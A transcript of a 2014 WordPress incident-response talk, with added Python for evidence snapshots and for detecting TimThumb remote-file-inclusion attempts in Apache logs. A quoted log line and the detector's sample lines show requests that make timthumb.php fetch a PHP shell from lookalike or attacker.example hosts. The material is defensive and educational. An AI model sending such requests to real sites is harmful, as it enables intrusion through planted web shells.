Are you ready to be hacked?

ARE YOU READY TO BE HACKED? Daniel Kanchev @dvkanchev May 17th, 2014

Description

This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, assets evaluation and getting help from the right people that know WordPress and care about security.

Transcript of Are you ready to be hacked?

Page 1: Are you ready to be hacked?

ARE YOU READY TO BE HACKED?

Daniel Kanchev @dvkanchev

May 17th, 2014

Page 2: Are you ready to be hacked?

WHO AM I?

• 7+ Years of WordPress experience

• 5 Years with SiteGround

• Love FOSS

• Security Freak

• Addicted to extreme sports

Daniel Kanchev

Page 3: Are you ready to be hacked?

IN THIS SESSION

• Why Should YOU Care

• Assets Evaluation

• Getting Help

• A KISS Disaster Recovery Plan

• Conclusion

Page 4: Are you ready to be hacked?

WHY MEEEEEEEE ???

Page 5: Are you ready to be hacked?

IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

Page 6: Are you ready to be hacked?

77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

Page 7: Are you ready to be hacked?

MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

Page 8: Are you ready to be hacked?

THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012!

+700%

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

Page 9: Are you ready to be hacked?

ATTACKS PER DAY

2013: 570,000

2012: 464,000

2010: 190,000

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

Page 10: Are you ready to be hacked?

ASSETS EVALUATION

Page 11: Are you ready to be hacked?

MODULAR DESIGN

• Divide your site into logical components

• Allocate a weight to each component

• Sort the components by criticality

Page 12: Are you ready to be hacked?

EXAMPLE TABLE

Component            Weight
-------------------  ------
WooCommerce plugin   4
Custom theme         3
Gallery plugin       2
Contact form         1

Page 13: Are you ready to be hacked?

GETTING HELP

Page 14: Are you ready to be hacked?

IDENTIFY WHO CAN HELP YOU

• The support team of your web host

• Plugin and theme developers

• Third party companies

• Security specialists

Page 15: Are you ready to be hacked?

THE SUPPORT TEAM OF YOUR WEB HOST

• Website diagnostics

• Website backups and restores

• Log analysis

• WordPress core/plugin/theme upgrades

• Regular Security Audits

• Malware notifications and malicious code cleaning

Page 16: Are you ready to be hacked?

PLUGIN AND THEME DEVELOPERS/SUPPORT

• New plugin/theme versions

• Security updates

• Migration to new versions of your themes/plugins

Page 17: Are you ready to be hacked?

DISASTER RECOVERY PLAN

Page 18: Are you ready to be hacked?

7 "EASY" STEPS

1. DON'T PANIC!

2. Create a copy of the hacked site + all logs

3. Quarantine your site

4. Remove the malicious code

5. Check the archived logs for the source of the attack

6. Resolve the security issues that caused the problem

7. “Unquarantine” your site

Page 19: Are you ready to be hacked?

1. BACKUP YOUR HACKED SITE

How to backup:

1. mysqldump -uU -pP DB > yoursitefolder/DB.sql

2. tar zcvf backup.tar.gz yoursitefolder

(U = database user, P = database password, DB = database name; the dump is written inside the site folder so the tar archive contains both files and database.)

Why to do this:

This is needed so that you can later find out the source of the attack/vulnerability!

Page 20: Are you ready to be hacked?

USEFUL LOGS (on a cPanel server)

• /var/log/messages - FTP log for PureFTPd

• /usr/local/apache/domlogs/DOMAIN.COM - Apache access log

• /var/log/exim_mainlog - Exim mail server log

• /usr/local/cpanel/logs/access_log - cPanel File Manager log

• /var/log/secure - SSH connections log
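The two slides above (back up the hacked site, then the logs worth keeping) are easy to combine into one evidence-preservation script. The following Python is an added example, not code from the slides or from SiteGround: it archives the site folder, copies whichever of the listed cPanel logs exist on the server, and writes a SHA-256 manifest so that the copy handed to a security specialist can later be shown to be unaltered. The function names (snapshot_site, verify_snapshot, mysqldump_command) are this example's own; DOMAIN.COM stays the placeholder it is on the slide, and the database dump helper only builds the mysqldump command line so that the password is read from the MYSQL_PWD environment variable instead of appearing in the process list of a shared host.

```python
"""Evidence snapshot of a compromised site (added example, not from the slides)."""
import hashlib
import os
import shutil
import tarfile
from pathlib import Path

# Logs named on the "USEFUL LOGS (on a cPanel server)" slide.
# DOMAIN.COM is a placeholder for the site's own domlog, as on the slide.
CPANEL_LOGS = [
    "/var/log/messages",                     # PureFTPd
    "/usr/local/apache/domlogs/DOMAIN.COM",  # Apache access log
    "/var/log/exim_mainlog",                 # Exim mail server
    "/usr/local/cpanel/logs/access_log",     # cPanel File Manager
    "/var/log/secure",                       # SSH connections
]

MANIFEST = "SHA256SUMS"


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks so large archives do not need to fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def mysqldump_command(db, user):
    """argv for the slide's `mysqldump -uU -pP DB`, without the password on the
    command line: export MYSQL_PWD before running it so `ps` does not reveal it."""
    return ["mysqldump", "--single-transaction", "-u", user, db]


def snapshot_site(site_dir, out_dir, log_paths=CPANEL_LOGS):
    """Archive site_dir and every readable log into out_dir; return the manifest path."""
    site_dir, out_dir = Path(site_dir), Path(out_dir)
    logs_dir = out_dir / "logs"
    logs_dir.mkdir(parents=True, exist_ok=True)

    # Slide step 2: tar zcvf backup.tar.gz yoursitefolder
    with tarfile.open(str(out_dir / "site.tar.gz"), "w:gz") as tar:
        tar.add(str(site_dir), arcname=site_dir.name)

    # Copy the listed logs that exist here; copy2 keeps the original mtimes
    for log in log_paths:
        if os.path.isfile(log) and os.access(log, os.R_OK):
            shutil.copy2(log, logs_dir / Path(log).name)

    # Hash everything collected so tampering with the evidence is detectable
    files = sorted((p for p in out_dir.rglob("*") if p.is_file() and p.name != MANIFEST), key=str)
    lines = [f"{sha256_file(p)}  {p.relative_to(out_dir).as_posix()}" for p in files]
    manifest = out_dir / MANIFEST
    manifest.write_text("\n".join(lines) + "\n")
    return manifest


def verify_snapshot(out_dir):
    """Return the relative paths whose content no longer matches the manifest (empty = intact)."""
    out_dir = Path(out_dir)
    bad = []
    for line in (out_dir / MANIFEST).read_text().splitlines():
        digest, rel = line.split("  ", 1)
        p = out_dir / rel
        if not p.is_file() or sha256_file(p) != digest:
            bad.append(rel)
    return bad


if __name__ == "__main__":
    import sys
    manifest = snapshot_site(sys.argv[1], sys.argv[2])
    print(f"wrote {manifest}; mismatches now: {verify_snapshot(sys.argv[2])}")
```

Run it as `python snapshot.py /home/user/public_html /root/evidence-YYYYMMDD` before touching anything on the site; keep the evidence directory outside the web root and re-run verify_snapshot after handing it over, so both sides agree the logs were not edited during the clean-up.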

Page 21: Are you ready to be hacked?

2. QUARANTINE YOUR SITE + CHANGE PASSWORDS

1. Protect your users and visitors

2. Prevent Google from accessing your hacked site

3. Keep hackers away during the cleaning of the site

Page 22: Are you ready to be hacked?

USE .HTACCESS MAGIC

<IfModule mod_rewrite.c>
RewriteEngine On
# 123.56.89.12 stands for your own IP address, which is still allowed in
RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12$
RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
RewriteCond %{SCRIPT_FILENAME} !maintenance.html
RewriteRule ^.*$ /maintenance.html [R=503,L]
ErrorDocument 503 /maintenance.html
</IfModule>
<IfModule mod_headers.c>
Header set Retry-After "14400"
Header set Cache-Control "max-age=0, no-store"
</IfModule>

(Create the empty file maintenance.enable to switch the quarantine on and delete it to switch it off; the 503 status keeps search engines from indexing the maintenance page.)

Page 23: Are you ready to be hacked?

3. REMOVE THE MALICIOUS CODE

1. Restore the site from a clean backup

OR

2. Clean the affected files/database tables

Page 24: Are you ready to be hacked?

4. ARCHIVED LOGS ANALYSIS

• Is complicated

• Is time consuming

• Requires advanced HTTP knowledge

• Should be performed by security specialists

Page 25: Are you ready to be hacked?

EXAMPLE - THE TIMTHUMB HACK

189.100.29.167 - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.ex l.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"

• 189.100.29.167 - IP of the attacker

• premiumtheme/timthumb.php - Vulnerable script

• wp-mails.php - PHP shell script
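The log line above is exactly the kind of entry a reviewer hunts for in the archived access log: a request to timthumb.php whose src= parameter fetches a file from a host that only looks like an allowed image domain. The following Python is an added example, not code from the slides: it parses Apache combined-log lines (including the slide's variant with a single "-" before the timestamp) and reports requests to the vulnerable script whose remote src host is neither an allowed host nor a true subdomain of one, so that "www.blogger.com.attacker.example" is flagged while "img.blogger.com" is not. The allowlist, the sample log lines and the function names are this example's own constructions; the sample IPs come from the documentation ranges and ".example" is a reserved domain.

```python
"""Added example (not from the slides): flag TimThumb remote-file-inclusion
attempts in an Apache access log, like the hit shown on the slide."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log regex; the optional group also accepts the slide's variant
# with a single "-" between the client IP and the timestamp.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?:\S+ )?\S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Hosts this site legitimately resizes images from (assumption for the example).
ALLOWED_IMAGE_HOSTS = ("blogger.com", "example.com")

# Constructed sample lines, modelled on the slide's entry.
SAMPLE_LOG = [
    '192.0.2.10 - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php'
    '?src=http://www.blogger.com.attacker.example/max/wp-mails.php HTTP/1.1" 301 - "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [12/Apr/2014:07:01:02 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php'
    '?src=http://img.blogger.com/photo.jpg&w=100 HTTP/1.1" 200 5120 "http://example.com/" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Apr/2014:07:05:00 +1000] "GET /index.php HTTP/1.1" 200 2048 "-" "curl/7.30"',
    '192.0.2.10 - - [12/Apr/2014:07:09:13 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php'
    '?src=http%3A%2F%2Fblogger.com.attacker.example%2Fshell.php HTTP/1.1" 400 - "-" "-"',
]


def parse_line(line):
    """Return the fields of one combined-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def host_allowed(host, allowed=ALLOWED_IMAGE_HOSTS):
    """Exact host or a true subdomain only; never a substring match like TimThumb used."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def remote_src(path):
    """(hostname, path) of an absolute http(s) src= in the request, else None.
    parse_qs also decodes percent-encoded values such as http%3A%2F%2F."""
    src = parse_qs(urlsplit(path).query).get("src", [""])[0]
    u = urlsplit(src)
    if u.scheme in ("http", "https") and u.hostname:
        return u.hostname, u.path
    return None


def find_rfi_attempts(lines, script="timthumb.php", allowed=ALLOWED_IMAGE_HOSTS):
    """Requests to `script` whose src= fetches from a host outside the allowlist."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not urlsplit(entry["path"]).path.lower().endswith(script):
            continue
        remote = remote_src(entry["path"])
        if remote is None or host_allowed(remote[0], allowed):
            continue
        host, src_path = remote
        findings.append({
            "ip": entry["ip"],
            "time": entry["time"],
            "src_host": host,
            # the fetched file is itself PHP: the slide's wp-mails.php shell pattern
            "script_src": src_path.lower().endswith(".php"),
            "status": int(entry["status"]),
        })
    return findings


if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

On a real server feed it the domlog copied during the backup step (`find_rfi_attempts(open(path))` works line by line); the attacker IP and timestamps in the findings are what you then look for in the FTP, SSH and cPanel logs to see whether the shell was used afterwards.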

Page 26: Are you ready to be hacked?

5. RESOLVE THE SECURITY ISSUES

• Upgrade WP core, plugins and themes

• Upgrade server software if needed

• Patch your code and use a WAF in case there are no upgrades available

Page 27: Are you ready to be hacked?

6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS

• Remove the maintenance page

• Inform users about the breach if needed

• Keep an eye on your files/DB

Page 28: Are you ready to be hacked?

CONCLUSION

• Web security is complicated!

• Rely on partners to recover your site.

• Be ready to manage the whole process.

• Know your assets.

• Make sure you have good security awareness.

• Security is a journey - NOT a destination!

Page 29: Are you ready to be hacked?

THANK YOU